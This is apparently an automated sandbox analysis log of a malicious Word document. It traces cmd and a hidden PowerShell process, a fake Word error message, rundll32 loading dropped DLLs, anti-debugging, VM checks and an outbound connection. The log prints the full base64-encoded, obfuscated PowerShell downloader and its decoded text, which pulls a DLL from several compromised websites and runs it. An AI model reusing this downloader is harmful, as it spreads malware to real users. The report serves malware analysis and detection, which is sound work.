                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021109C FindFirstFileW,15_2_0021109C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: rundll32.exe, 00000008.00000003.2110699368.0000000000389000.00000004.00000001.sdmpBinary or memory string: ntnagerVMware_S
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h]7_2_0022C4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC4FF mov eax, dword ptr fs:[00000030h]8_2_002AC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC4FF mov eax, dword ptr fs:[00000030h]9_2_006CC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC4FF mov eax, dword ptr fs:[00000030h]10_2_001DC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC4FF mov eax, dword ptr fs:[00000030h]11_2_004BC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC4FF mov eax, dword ptr fs:[00000030h]12_2_007DC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026C4FF mov eax, dword ptr fs:[00000030h]13_2_0026C4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006BC4FF mov eax, dword ptr fs:[00000030h]14_2_006BC4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h]15_2_0021C4FF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,7_2_10001B30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10007F07

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80Jump to behavior
                    Encrypted powershell cmdline option foundShow sources
                    Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'cJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLLJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLLJump to behavior
